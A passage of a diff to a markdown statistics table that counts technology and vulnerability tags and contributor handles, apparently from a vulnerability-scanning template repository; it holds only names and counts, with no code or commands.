mrcl0wnlab | 1 | | | | | | | -| processwire | 3 | manuelbua | 1 | | | | | | | -| samba | 3 | piyushchhiroliya | 1 | | | | | | | -| finecms | 3 | th3.d1p4k | 1 | | | | | | | -| flexvnf | 3 | justmumu | 1 | | | | | | | -| axis | 3 | intx0x80 | 1 | | | | | | | -| goanywhere | 3 | davidfegyver | 1 | | | | | | | -| getsimple | 3 | jiheon-dev | 1 | | | | | | | -| pfsense | 3 | wabafet | 1 | | | | | | | -| mongo | 3 | kiransau | 1 | | | | | | | -| harbor | 3 | ratnadip gajbhiye | 1 | | | | | | | -| eshop | 3 | rotemreiss | 1 | | | | | | | -| netdata | 3 | ggranjus | 1 | | | | | | | -| square | 3 | elder tao | 1 | | | | | | | -| ruckus | 3 | xeldax | 1 | | | | | | | -| linksys | 3 | streetofhackerr007 | 1 | | | | | | | -| circleci | 3 | igibanez | 1 | | | | | | | -| weiphp | 3 | miroslavsotak | 1 | | | | | | | -| elementor | 3 | becivells | 1 | | | | | | | -| microfocus | 3 | prettyboyaaditya | 1 | | | | | | | -| buffalo | 3 | viniciuspereiras | 1 | | | | | | | -| bigant | 3 | retr0 | 1 | | | | | | | -| jeesns | 3 | c3l3si4n | 1 | | | | | | | -| targa | 3 | mah3sec_ | 1 | | | | | | | -| graylog | 3 | arall | 1 | | | | | | | -| heroku | 3 | aayush vishnoi | 1 | | | | | | | -| metabase | 3 | erethon | 1 | | | | | | | -| telnet | 3 | duty_1g | 1 | | | | | | | -| tableau | 3 | rschio | 1 | | | | | | | -| httpbin | 3 | p-l- | 1 | | | | | | | -| zend | 3 | ling | 1 | | | | | | | -| odoo | 3 | nytr0gen | 1 | | | | | | | -| blockchain | 3 | philippdelteil | 1 | | | | | | | -| dreambox | 3 | act1on3 | 1 | | | | | | | -| pega | 3 | theabhinavgaur | 1 | | | | | | | -| zeroshell | 3 | exid | 1 | | | | | | | -| steve | 3 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | | | | | | | | -| nortek | 3 | kareemse1im | 1 | | | | | | | -| openam | 3 | furkansenan | 1 | | | | | | | -| avtech | 3 | ptonewreckin | 1 | | | | | | | -| sugarcrm | 3 | wlayzz | 1 | | | | | | | -| jfrog | 3 | manasmbellani | 1 | | | | | | | -| codeigniter | 3 | nielsing | 1 | | | | | | | -| key | 3 | thevillagehacker | 1 | | | | | | | -| ampps | 3 | absshax | 1 | | | | | | | -| concrete | 3 | orpheus | 1 | | | | | | | -| 3cx | 3 | noobexploiter | 1 | | | | | | | -| bitbucket | 3 | luqmaan hadia | 1 | | | | | | | -| splunk | 3 | hardik-rathod | 1 | | | | | | | -| ec2 | 3 | ohlinge | 1 | | | | | | | -| smb | 3 | ldionmarcil | 1 | | | | | | | -| rlm | 3 | _darrenmartyn | 1 | | | | | | | -| scriptcase | 2 | sec_hawk | 1 | | | | | | | -| veeam | 2 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| openwrt | 2 | chron0x | 1 | | | | | | | -| chamilo | 2 | b4uh0lz | 1 | | | | | | | -| carel | 2 | arr0way | 1 | | | | | | | -| dbeaver | 2 | tirtha_mandal | 1 | | | | | | | -| ghost | 2 | alex | 1 | | | | | | | -| eventum | 2 | open-sec | 1 | | | | | | | -| idor | 2 | liquidsec | 1 | | | | | | | -| kafdrop | 2 | momen eldawakhly | 1 | | | | | | | -| hasura | 2 | zandros0 | 1 | | | | | | | -| opencart | 2 | ph33rr | 1 | | | | | | | -| seeddms | 2 | bartu utku sarp | 1 | | | | | | | -| gitbook | 2 | aresx | 1 | | | | | | | -| qcubed | 2 | whynotke | 1 | | | | | | | -| wooyun | 2 | udyz | 1 | | | | | | | -| bomgar | 2 | makyotox | 1 | | | | | | | -| electron | 2 | yavolo | 1 | | | | | | | -| emqx | 2 | aaron_costello | 1 | | | | | | | +| dubbo | 2 | screamy | 1 | | | | | | | +| dlp | 2 | ringo | 1 | | | | | | | +| blesta | 2 | whynotke | 1 | | | | | | | +| webcam | 2 | knassar702 | 1 | | | | | | | +| wapples | 2 | luskabol | 1 | | | | | | | +| pcoip | 2 | bjhulst | 1 | | | | | | | +| exacqvision | 2 | aayush vishnoi | 1 | | | | | | | +| checkpoint | 2 | dhiyaneshdki | 1 | | | | | | | +| password | 2 | anon-artist | 1 | | | | | | | +| novnc | 2 | infosecsanyam | 1 | | | | | | | +| relatedposts | 2 | momen eldawakhly | 1 | | | | | | | +| ldap | 2 | tirtha_mandal | 1 | | | | | | | +| fortiweb | 2 | luqmaan hadia | 1 | | | | | | | +| | | [luqiih](https://github.com/luqiih) | | | | | | | | +| matomo | 2 | shifacyclewla | 1 | | | | | | | +| eris | 2 | aaron_costello | 1 | | | | | | | | | | (@conspiracyproof) | | | | | | | | -| nasos | 2 | daviey | 1 | | | | | | | -| ldap | 2 | shreyapohekar | 1 | | | | | | | -| synopsys | 2 | 0ut0fb4nd | 1 | | | | | | | -| horizon | 2 | kiks7 | 1 | | | | | | | -| gitlist | 2 | matthew nickerson (b0than) @ | 1 | | | | | | | -| | | layer 8 security | | | | | | | | -| seowon | 2 | _harleo | 1 | | | | | | | -| omnia | 2 | willd96 | 1 | | | | | | | -| cargo | 2 | jaimin gondaliya | 1 | | | | | | | -| craftcms | 2 | vzamanillo | 1 | | | | | | | -| impresscms | 2 | evan rubinstien | 1 | | | | | | | -| syslog | 2 | xshuden | 1 | | | | | | | -| metersphere | 2 | failopen | 1 | | | | | | | -| password | 2 | jna1 | 1 | | | | | | | -| newrelic | 2 | 1nf1n7y | 1 | | | | | | | -| mida | 2 | zsusac | 1 | | | | | | | -| ericsson | 2 | mesaglio | 1 | | | | | | | -| osticket | 2 | af001 | 1 | | | | | | | -| pgadmin | 2 | ahmetpergamum | 1 | | | | | | | -| dotnet | 2 | pjborah | 1 | | | | | | | -| circontrol | 2 | w0tx | 1 | | | | | | | -| corebos | 2 | apt-mirror | 1 | | | | | | | -| frp | 2 | regala_ | 1 | | | | | | | -| hiveos | 2 | revblock | 1 | | | | | | | -| seacms | 2 | iphantasmic | 1 | | | | | | | -| ixcache | 2 | jeya seelan | 1 | | | | | | | -| swagger | 2 | ransomsec | 1 | | | | | | | -| sniplets | 2 | knassar702 | 1 | | | | | | | -| blesta | 2 | fmunozs | 1 | | | | | | | -| intellian | 2 | osamahamad | 1 | | | | | | | -| pam | 2 | breno_css | 1 | | | | | | | -| gateway | 2 | geraldino2 | 1 | | | | | | | -| unisharp | 2 | 5up3r541y4n | 1 | | | | | | | -| fiori | 2 | shiar | 1 | | | | | | | -| ubnt | 2 | carlosvieira | 1 | | | | | | | -| dubbo | 2 | flag007 | 1 | | | | | | | -| skycaiji | 2 | bad5ect0r | 1 | | | | | | | -| webpagetest | 2 | sherlocksecurity | 1 | | | | | | | -| guacamole | 2 | fopina | 1 | | | | | | | -| smartstore | 2 | 8authur | 1 | | | | | | | -| teampass | 2 | spac3wh1te | 1 | | | | | | | -| traefik | 2 | mass0ma | 1 | | | | | | | -| aqua | 2 | kabirsuda | 1 | | | | | | | -| twitter | 2 | 0xceba | 1 | | | | | | | -| natshell | 2 | jcockhren | 1 | | | | | | | -| kiwitcms | 2 | | | | | | | | | +| cve2006 | 2 | jiheon-dev | 1 | | | | | | | +| forum | 2 | rotemreiss | 1 | | | | | | | +| contao | 2 | jna1 | 1 | | | | | | | +| code42 | 2 | yavolo | 1 | | | | | | | +| synopsys | 2 | elmahdi | 1 | | | | | | | +| favicon | 2 | 2rs3c | 1 | | | | | | | +| eko | 2 | kr1shna4garwal | 1 | | | | | | | +| dos | 2 | zhenwarx | 1 | | | | | | | +| dvwa | 2 | revblock | 1 | | | | | | | +| nasos | 2 | jaimin gondaliya | 1 | | | | | | | +| osticket | 2 | aringo | 1 | | | | | | | +| arcgis | 2 | clment cruchet | 1 | | | | | | | +| webalizer | 2 | queencitycyber | 1 | | | | | | | +| audiocodes | 2 | un-fmunozs | 1 | | | | | | | +| owasp | 2 | kiks7 | 1 | | | | | | | +| books | 2 | majidmc2 | 1 | | | | | | | +| rancher | 2 | _c0wb0y_ | 1 | | | | | | | +| jquery | 2 | alperenkesk | 1 | | | | | | | +| virtua | 2 | bughuntersurya | 1 | | | | | | | +| kong | 2 | calumjelrick | 1 | | | | | | | +| igs | 2 | fopina | 1 | | | | | | | +| horizon | 2 | fmunozs | 1 | | | | | | | +| rockmongo | 2 | ptonewreckin | 1 | | | | | | | +| apple | 2 | noobexploiter | 1 | | | | | | | +| f5 | 2 | y0no | 1 | | | | | | | +| ovirt | 2 | pdp | 1 | | | | | | | +| avantfax | 2 | b4uh0lz | 1 | | | | | | | +| zerof | 2 | davidfegyver | 1 | | | | | | | +| owncloud | 2 | kurohost | 1 | | | | | | | +| hadoop | 2 | | | | | | | | | +| espeasy | 2 | | | | | | | | | +| motorola | 2 | | | | | | | | | +| zblogphp | 2 | | | | | | | | | +| gophish | 2 | | | | | | | | | +| wildfly | 2 | | | | | | | | | +| ghost | 2 | | | | | | | | | +| h3c | 2 | | | | | | | | | +| frp | 2 | | | | | | | | | +| hetzner | 2 | | | | | | | | | +| portal | 2 | | | | | | | | | +| myfactory | 2 | | | | | | | | | +| uwsgi | 2 | | | | | | | | | +| hospital | 2 | | | | | | | | | +| zzcms | 2 | | | | | | | | | +| hubspot | 2 | | | | | | | | | +| chamilo | 2 | | | | | | | | | +| erxes | 2 | | | | | | | | | +| conductor | 2 | | | | | | | | | +| guacamole | 2 | | | | | | | | | +| nextjs | 2 | | | | | | | | | +| metersphere | 2 | | | | | | | | | +| docs | 2 | | | | | | | | | +| ubnt | 2 | | | | | | | | | +| testrail | 2 | | | | | | | | | +| ambari | 2 | | | | | | | | | +| gitblit | 2 | | | | | | | | | +| embed | 2 | | | | | | | | | +| default-page | 2 | | | | | | | | | +| idor | 2 | | | | | | | | | +| backups | 2 | | | | | | | | | +| chiyu | 2 | | | | | | | | | +| places | 2 | | | | | | | | | +| lighttpd | 2 | | | | | | | | | +| waf | 2 | | | | | | | | | +| ilo | 2 | | | | | | | | | +| webpagetest | 2 | | | | | | | | | +| xenmobile | 2 | | | | | | | | | +| piwigo | 2 | | | | | | | | | +| aqua | 2 | | | | | | | | | +| dynamicweb | 2 | | | | | | | | | +| rosariosis | 2 | | | | | | | | | +| pam | 2 | | | | | | | | | +| aerohive | 2 | | | | | | | | | +| sdwan | 2 | | | | | | | | | +| tapestry | 2 | | | | | | | | | +| eprints | 2 | | | | | | | | | +| terraform | 2 | | | | | | | | | +| asus | 2 | | | | | | | | | +| pacsone | 2 | | | | | | | | | +| gespage | 2 | | | | | | | | | +| octoprint | 2 | | | | | | | | | +| flir | 2 | | | | | | | | | +| vscode | 2 | | | | | | | | | +| mybb | 2 | | | | | | | | | +| tileserver | 2 | | | | | | | | | +| adiscon | 2 | | | | | | | | | +| prestshop | 2 | | | | | | | | | +| qcubed | 2 | | | | | | | | | +| newrelic | 2 | | | | | | | | | +| sniplets | 2 | | | | | | | | | +| showdoc | 2 | | | | | | | | | +| kafdrop | 2 | | | | | | | | | | livezilla | 2 | | | | | | | | | -| bash | 2 | | | | | | | | | -| clamav | 2 | | | | | | | | | -| wapples | 2 | | | | | | | | | -| openssh | 2 | | | | | | | | | -| pmb | 2 | | | | | | | | | -| bigbluebutton | 2 | | | | | | | | | -| rstudio | 2 | | | | | | | | | -| exacqvision | 2 | | | | | | | | | -| xiaomi | 2 | | | | | | | | | -| sourcecodester | 2 | | | | | | | | | -| nordex | 2 | | | | | | | | | +| codemeter | 2 | | | | | | | | | +| readme | 2 | | | | | | | | | +| tidb | 2 | | | | | | | | | +| sqlite | 2 | | | | | | | | | +| vigorconnect | 2 | | | | | | | | | +| cyberoam | 2 | | | | | | | | | +| redhat | 2 | | | | | | | | | | landesk | 2 | | | | | | | | | | tongda | 2 | | | | | | | | | -| netsus | 2 | | | | | | | | | -| domxss | 2 | | | | | | | | | -| ilo | 2 | | | | | | | | | -| rosariosis | 2 | | | | | | | | | -| vscode | 2 | | | | | | | | | -| itop | 2 | | | | | | | | | -| motorola | 2 | | | | | | | | | -| zzzcms | 2 | | | | | | | | | -| contao | 2 | | | | | | | | | -| tplink | 2 | | | | | | | | | -| sqlite | 2 | | | | | | | | | -| couchbase | 2 | | | | | | | | | -| cloudinary | 2 | | | | | | | | | -| opencpu | 2 | | | | | | | | | -| flightpath | 2 | | | | | | | | | -| wpqa | 2 | | | | | | | | | -| azkaban | 2 | | | | | | | | | -| waf | 2 | | | | | | | | | -| avaya | 2 | | | | | | | | | -| forum | 2 | | | | | | | | | -| xoops | 2 | | | | | | | | | -| linux | 2 | | | | | | | | | -| owncloud | 2 | | | | | | | | | -| graphite | 2 | | | | | | | | | -| clansphere | 2 | | | | | | | | | -| sass | 2 | | | | | | | | | -| qihang | 2 | | | | | | | | | -| reolink | 2 | | | | | | | | | -| opsview | 2 | | | | | | | | | -| fortimail | 2 | | | | | | | | | -| erxes | 2 | | | | | | | | | -| zzcms | 2 | | | | | | | | | -| hetzner | 2 | | | | | | | | | -| adiscon | 2 | | | | | | | | | -| wildfly | 2 | | | | | | | | | -| sidekiq | 2 | | | | | | | | | -| mbean | 2 | | | | | | | | | -| overflow | 2 | | | | | | | | | -| dataiku | 2 | | | | | | | | | -| alfresco | 2 | | | | | | | | | -| akamai | 2 | | | | | | | | | -| middleware | 2 | | | | | | | | | -| werkzeug | 2 | | | | | | | | | -| rundeck | 2 | | | | | | | | | -| dashboard | 2 | | | | | | | | | -| temenos | 2 | | | | | | | | | -| wamp | 2 | | | | | | | | | -| iptime | 2 | | | | | | | | | -| dokuwiki | 2 | | | | | | | | | -| matomo | 2 | | | | | | | | | -| watchguard | 2 | | | | | | | | | -| jquery | 2 | | | | | | | | | -| cocoon | 2 | | | | | | | | | -| netis | 2 | | | | | | | | | -| h3c | 2 | | | | | | | | | -| prestshop | 2 | | | | | | | | | -| mybb | 2 | | | | | | | | | -| allied | 2 | | | | | | | | | -| commax | 2 | | | | | | | | | -| listserv | 2 | | | | | | | | | -| eprints | 2 | | | | | | | | | -| oidc | 2 | | | | | | | | | -| otobo | 2 | | | | | | | | | -| tornado | 2 | | | | | | | | | -| upload | 2 | | | | | | | | | -| asus | 2 | | | | | | | | | -| kavita | 2 | | | | | | | | | -| weather | 2 | | | | | | | | | -| cyberoam | 2 | | | | | | | | | -| airtame | 2 | | | | | | | | | -| favicon | 2 | | | | | | | | | -| zywall | 2 | | | | | | | | | -| accela | 2 | | | | | | | | | -| eris | 2 | | | | | | | | | -| javascript | 2 | | | | | | | | | -| glances | 2 | | | | | | | | | -| cas | 2 | | | | | | | | | -| sequoiadb | 2 | | | | | | | | | -| projectsend | 2 | | | | | | | | | -| livehelperchat | 2 | | | | | | | | | -| angular | 2 | | | | | | | | | -| j2ee | 2 | | | | | | | | | -| shenyu | 2 | | | | | | | | | -| dvwa | 2 | | | | | | | | | -| tasmota | 2 | | | | | | | | | -| yapi | 2 | | | | | | | | | -| yii | 2 | | | | | | | | | -| inspur | 2 | | | | | | | | | -| zblogphp | 2 | | | | | | | | | -| xml | 2 | | | | | | | | | -| hjtcloud | 2 | | | | | | | | | -| conductor | 2 | | | | | | | | | -| tileserver | 2 | | | | | | | | | -| ambari | 2 | | | | | | | | | -| novnc | 2 | | | | | | | | | -| terraform | 2 | | | | | | | | | -| eyesofnetwork | 2 | | | | | | | | | -| vidyo | 2 | | | | | | | | | -| myfactory | 2 | | | | | | | | | -| testrail | 2 | | | | | | | | | -| avantfax | 2 | | | | | | | | | -| text | 2 | | | | | | | | | -| bitly | 2 | | | | | | | | | -| ebook | 2 | | | | | | | | | -| flir | 2 | | | | | | | | | -| chyrp | 2 | | | | | | | | | -| arcgis | 2 | | | | | | | | | -| xweb500 | 2 | | | | | | | | | -| fastcgi | 2 | | | | | | | | | -| xceedium | 2 | | | | | | | | | -| ispy | 2 | | | | | | | | | -| emby | 2 | | | | | | | | | -| plastic | 2 | | | | | | | | | -| fortiweb | 2 | | | | | | | | | -| supermicro | 2 | | | | | | | | | -| codemeter | 2 | | | | | | | | | -| etherpad | 2 | | | | | | | | | -| xnat | 2 | | | | | | | | | -| dlp | 2 | | | | | | | | | -| jeedom | 2 | | | | | | | | | -| ad | 2 | | | | | | | | | -| orchid | 2 | | | | | | | | | -| backups | 2 | | | | | | | | | -| igs | 2 | | | | | | | | | -| totemomail | 2 | | | | | | | | | -| apollo | 2 | | | | | | | | | -| neos | 2 | | | | | | | | | -| zms | 2 | | | | | | | | | -| idea | 2 | | | | | | | | | -| wuzhicms | 2 | | | | | | | | | -| openresty | 2 | | | | | | | | | -| puppetdb | 2 | | | | | | | | | -| influxdb | 2 | | | | | | | | | -| xxljob | 2 | | | | | | | | | -| xenmobile | 2 | | | | | | | | | -| pascom | 2 | | | | | | | | | -| cgi | 2 | | | | | | | | | -| node-red-dashboard | 2 | | | | | | | | | -| javamelody | 2 | | | | | | | | | -| uwsgi | 2 | | | | | | | | | -| xerox | 2 | | | | | | | | | -| hadoop | 2 | | | | | | | | | -| tidb | 2 | | | | | | | | | -| dynamicweb | 2 | | | | | | | | | -| pacsone | 2 | | | | | | | | | -| lighttpd | 2 | | | | | | | | | -| chiyu | 2 | | | | | | | | | -| kkFileView | 2 | | | | | | | | | -| phpshowtime | 2 | | | | | | | | | -| eko | 2 | | | | | | | | | -| dvr | 2 | | | | | | | | | -| saltstack | 2 | | | | | | | | | -| rancher | 2 | | | | | | | | | -| avada | 2 | | | | | | | | | -| aerohive | 2 | | | | | | | | | -| aruba | 2 | | | | | | | | | -| sysaid | 2 | | | | | | | | | -| apple | 2 | | | | | | | | | -| pulse | 2 | | | | | | | | | -| netflix | 2 | | | | | | | | | -| rackstation | 2 | | | | | | | | | -| mailgun | 2 | | | | | | | | | -| viewpoint | 2 | | | | | | | | | -| virtua | 2 | | | | | | | | | -| acrolinx | 2 | | | | | | | | | -| resourcespace | 2 | | | | | | | | | -| ecoa | 2 | | | | | | | | | -| virtualui | 2 | | | | | | | | | -| jmx | 2 | | | | | | | | | -| aviatrix | 2 | | | | | | | | | -| piwigo | 2 | | | | | | | | | -| gcp | 2 | | | | | | | | | -| spark | 2 | | | | | | | | | -| konga | 2 | | | | | | | | | -| kettle | 2 | | | | | | | | | -| portal | 2 | | | | | | | | | -| vigorconnect | 2 | | | | | | | | | -| servicedesk | 2 | | | | | | | | | -| draytek | 2 | | | | | | | | | -| rockmongo | 2 | | | | | | | | | -| globaldomains | 2 | | | | | | | | | -| jsf | 2 | | | | | | | | | -| xampp | 2 | | | | | | | | | -| submitty | 2 | | | | | | | | | -| forcepoint | 2 | | | | | | | | | -| gradle | 2 | | | | | | | | | -| frontpage | 2 | | | | | | | | | -| loytec | 2 | | | | | | | | | -| default-page | 2 | | | | | | | | | -| places | 2 | | | | | | | | | -| shellshock | 2 | | | | | | | | | -| f5 | 2 | | | | | | | | | -| phpstorm | 2 | | | | | | | | | -| apereo | 2 | | | | | | | | | -| imap | 2 | | | | | | | | | -| ranger | 2 | | | | | | | | | -| superset | 2 | | | | | | | | | -| gryphon | 2 | | | | | | | | | -| owasp | 2 | | | | | | | | | -| idrac | 2 | | | | | | | | | -| homematic | 2 | | | | | | | | | -| csrf | 2 | | | | | | | | | -| wwbn | 2 | | | | | | | | | -| sas | 2 | | | | | | | | | -| books | 2 | | | | | | | | | -| discourse | 2 | | | | | | | | | -| gitblit | 2 | | | | | | | | | -| workspaceone | 2 | | | | | | | | | -| jitsi | 2 | | | | | | | | | -| netscaler | 2 | | | | | | | | | -| sdwan | 2 | | | | | | | | | -| lantronix | 2 | | | | | | | | | -| nuxeo | 2 | | | | | | | | | -| zerof | 2 | | | | | | | | | -| tapestry | 2 | | | | | | | | | -| maian | 2 | | | | | | | | | -| webcam | 2 | | | | | | | | | -| akkadian | 2 | | | | | | | | | | secret | 2 | | | | | | | | | -| pbootcms | 2 | | | | | | | | | -| checkpoint | 2 | | | | | | | | | -| dotnetnuke | 2 | | | | | | | | | -| cve2006 | 2 | | | | | | | | | -| embed | 2 | | | | | | | | | -| nextjs | 2 | | | | | | | | | -| pcoip | 2 | | | | | | | | | -| ametys | 2 | | | | | | | | | -| code42 | 2 | | | | | | | | | -| ovirt | 2 | | | | | | | | | -| mysql | 2 | | | | | | | | | -| octoprint | 2 | | | | | | | | | -| phpcollab | 2 | | | | | | | | | -| postgres | 2 | | | | | | | | | -| gespage | 2 | | | | | | | | | -| cassandra | 2 | | | | | | | | | -| showdoc | 2 | | | | | | | | | -| highmail | 2 | | | | | | | | | -| gophish | 2 | | | | | | | | | -| flatpress | 2 | | | | | | | | | -| redhat | 2 | | | | | | | | | -| nextcloud | 2 | | | | | | | | | -| casdoor | 2 | | | | | | | | | -| dos | 2 | | | | | | | | | +| javascript | 2 | | | | | | | | | +| j2ee | 2 | | | | | | | | | +| skycaiji | 2 | | | | | | | | | +| eyesofnetwork | 2 | | | | | | | | | +| tplink | 2 | | | | | | | | | +| rstudio | 2 | | | | | | | | | +| apollo | 2 | | | | | | | | | +| servicedesk | 2 | | | | | | | | | +| avaya | 2 | | | | | | | | | +| gateway | 2 | | | | | | | | | +| zms | 2 | | | | | | | | | +| netflix | 2 | | | | | | | | | +| openssh | 2 | | | | | | | | | +| kkFileView | 2 | | | | | | | | | +| dotnet | 2 | | | | | | | | | +| etherpad | 2 | | | | | | | | | +| electron | 2 | | | | | | | | | +| gitbook | 2 | | | | | | | | | +| plastic | 2 | | | | | | | | | +| zywall | 2 | | | | | | | | | +| listserv | 2 | | | | | | | | | +| glances | 2 | | | | | | | | | +| orchid | 2 | | | | | | | | | | froxlor | 2 | | | | | | | | | | loqate | 2 | | | | | | | | | -| kong | 2 | | | | | | | | | -| appcms | 2 | | | | | | | | | -| docs | 2 | | | | | | | | | -| hubspot | 2 | | | | | | | | | -| atmail | 2 | | | | | | | | | -| linkedin | 2 | | | | | | | | | +| phpcollab | 2 | | | | | | | | | +| seacms | 2 | | | | | | | | | +| xxljob | 2 | | | | | | | | | +| nextcloud | 2 | | | | | | | | | +| cas | 2 | | | | | | | | | +| angular | 2 | | | | | | | | | +| sysaid | 2 | | | | | | | | | | haproxy | 2 | | | | | | | | | +| cgi | 2 | | | | | | | | | +| javamelody | 2 | | | | | | | | | +| bitly | 2 | | | | | | | | | +| spark | 2 | | | | | | | | | +| hasura | 2 | | | | | | | | | +| superset | 2 | | | | | | | | | +| nordex | 2 | | | | | | | | | +| watchguard | 2 | | | | | | | | | +| dashboard | 2 | | | | | | | | | +| homematic | 2 | | | | | | | | | +| phpshowtime | 2 | | | | | | | | | +| circontrol | 2 | | | | | | | | | +| inspur | 2 | | | | | | | | | +| nuxeo | 2 | | | | | | | | | +| yii | 2 | | | | | | | | | +| alfresco | 2 | | | | | | | | | +| pbootcms | 2 | | | | | | | | | +| werkzeug | 2 | | | | | | | | | +| seeddms | 2 | | | | | | | | | +| bomgar | 2 | | | | | | | | | +| airtame | 2 | | | | | | | | | +| netsus | 2 | | | | | | | | | +| csrf | 2 | | | | | | | | | +| linkedin | 2 | | | | | | | | | +| casdoor | 2 | | | | | | | | | | auerswald | 2 | | | | | | | | | -| webalizer | 2 | | | | | | | | | -| ucmdb | 2 | | | | | | | | | -| xsuite | 2 | | | | | | | | | -| hospital | 2 | | | | | | | | | -| audiocodes | 2 | | | | | | | | | -| alienvault | 2 | | | | | | | | | +| jsf | 2 | | | | | | | | | +| teampass | 2 | | | | | | | | | +| couchbase | 2 | | | | | | | | | +| oidc | 2 | | | | | | | | | +| discourse | 2 | | | | | | | | | +| highmail | 2 | | | | | | | | | +| xnat | 2 | | | | | | | | | +| workspaceone | 2 | | | | | | | | | +| dotnetnuke | 2 | | | | | | | | | +| sas | 2 | | | | | | | | | +| mysql | 2 | | | | | | | | | +| accela | 2 | | | | | | | | | +| apereo | 2 | | | | | | | | | +| resourcespace | 2 | | | | | | | | | +| flightpath | 2 | | | | | | | | | +| mida | 2 | | | | | | | | | +| virtualui | 2 | | | | | | | | | +| middleware | 2 | | | | | | | | | +| sourcecodester | 2 | | | | | | | | | +| jitsi | 2 | | | | | | | | | +| node-red-dashboard | 2 | | | | | | | | | +| reolink | 2 | | | | | | | | | +| idrac | 2 | | | | | | | | | +| gradle | 2 | | | | | | | | | +| viewpoint | 2 | | | | | | | | | +| supermicro | 2 | | | | | | | | | +| itop | 2 | | | | | | | | | +| draytek | 2 | | | | | | | | | +| qihang | 2 | | | | | | | | | +| submitty | 2 | | | | | | | | | +| acrolinx | 2 | | | | | | | | | +| zzzcms | 2 | | | | | | | | | +| dvr | 2 | | | | | | | | | +| pulse | 2 | | | | | | | | | +| lantronix | 2 | | | | | | | | | +| phpstorm | 2 | | | | | | | | | +| aruba | 2 | | | | | | | | | +| gryphon | 2 | | | | | | | | | +| avada | 2 | | | | | | | | | +| clamav | 2 | | | | | | | | | +| hiveos | 2 | | | | | | | | | +| gitlist | 2 | | | | | | | | | +| netscaler | 2 | | | | | | | | | +| loytec | 2 | | | | | | | | | +| chyrp | 2 | | | | | | | | | +| openwrt | 2 | | | | | | | | | +| jmx | 2 | | | | | | | | | +| ebook | 2 | | | | | | | | | +| frontpage | 2 | | | | | | | | | +| rackstation | 2 | | | | | | | | | | hostheader-injection | 2 | | | | | | | | | -| espeasy | 2 | | | | | | | | | -| gnu | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| facturascripts | 1 | | | | | | | | | -| engage | 1 | | | | | | | | | -| pagecdn | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| locations | 1 | | | | | | | | | -| mod-proxy | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| maximo | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| flask | 1 | | | | | | | | | -| gallery | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| scanii | 1 | | | | | | | | | -| age-gate | 1 | | | | | | | | | -| superwebmailer | 1 | | | | | | | | | -| mastodon | 1 | | | | | | | | | -| wp-stats-manager | 1 | | | | | | | | | -| qualtrics | 1 | | | | | | | | | -| file-upload | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| pcoweb | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| etherscan | 1 | | | | | | | | | -| headers | 1 | | | | | | | | | -| xamr | 1 | | | | | | | | | -| devalcms | 1 | | | | | | | | | -| couchcms | 1 | | | | | | | | | -| nport | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| patreon-connect | 1 | | | | | | | | | -| qizhi | 1 | | | | | | | | | -| loganalyzer | 1 | | | | | | | | | -| blackbox | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| threatq | 1 | | | | | | | | | -| sling | 1 | | | | | | | | | -| arprice-responsive-pricing-table | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| todoist | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| buildkite | 1 | | | | | | | | | -| amdoren | 1 | | | | | | | | | -| workresources | 1 | | | | | | | | | -| php-fusion | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| microfinance | 1 | | | | | | | | | -| piano | 1 | | | | | | | | | -| asana | 1 | | | | | | | | | -| ipvpn | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| domos | 1 | | | | | | | | | -| credential | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | -| u5cms | 1 | | | | | | | | | -| dropbox | 1 | | | | | | | | | -| buildbot | 1 | | | | | | | | | -| memory-pipes | 1 | | | | | | | | | -| nagiosxi | 1 | | | | | | | | | -| satellian | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| blackduck | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| deviantart | 1 | | | | | | | | | -| totolink | 1 | | | | | | | | | -| onkyo | 1 | | | | | | | | | +| ispy | 2 | | | | | | | | | +| impresscms | 2 | | | | | | | | | +| kiwitcms | 2 | | | | | | | | | +| mailgun | 2 | | | | | | | | | +| ixcache | 2 | | | | | | | | | +| openresty | 2 | | | | | | | | | +| scriptcase | 2 | | | | | | | | | +| totemomail | 2 | | | | | | | | | +| eventum | 2 | | | | | | | | | +| otobo | 2 | | | | | | | | | +| kettle | 2 | | | | | | | | | +| tasmota | 2 | | | | | | | | | +| cocoon | 2 | | | | | | | | | +| syslog | 2 | | | | | | | | | +| wooyun | 2 | | | | | | | | | +| aviatrix | 2 | | | | | | | | | +| saltstack | 2 | | | | | | | | | +| akkadian | 2 | | | | | | | | | +| kavita | 2 | | | | | | | | | +| ericsson | 2 | | | | | | | | | +| ecoa | 2 | | | | | | | | | +| emby | 2 | | | | | | | | | +| corebos | 2 | | | | | | | | | +| xsuite | 2 | | | | | | | | | +| carel | 2 | | | | | | | | | +| emqx | 2 | | | | | | | | | +| gcp | 2 | | | | | | | | | +| allied | 2 | | | | | | | | | +| smartstore | 2 | | | | | | | | | +| wamp | 2 | | | | | | | | | +| xerox | 2 | | | | | | | | | +| graphite | 2 | | | | | | | | | +| rundeck | 2 | | | | | | | | | +| sass | 2 | | | | | | | | | +| clansphere | 2 | | | | | | | | | +| domxss | 2 | | | | | | | | | +| appcms | 2 | | | | | | | | | +| ad | 2 | | | | | | | | | +| livehelperchat | 2 | | | | | | | | | +| mbean | 2 | | | | | | | | | +| traefik | 2 | | | | | | | | | +| sidekiq | 2 | | | | | | | | | +| unisharp | 2 | | | | | | | | | +| xweb500 | 2 | | | | | | | | | +| dbeaver | 2 | | | | | | | | | +| overflow | 2 | | | | | | | | | +| pgadmin | 2 | | | | | | | | | +| opsview | 2 | | | | | | | | | +| ametys | 2 | | | | | | | | | +| seowon | 2 | | | | | | | | | +| fiori | 2 | | | | | | | | | +| natshell | 2 | | | | | | | | | +| yapi | 2 | | | | | | | | | 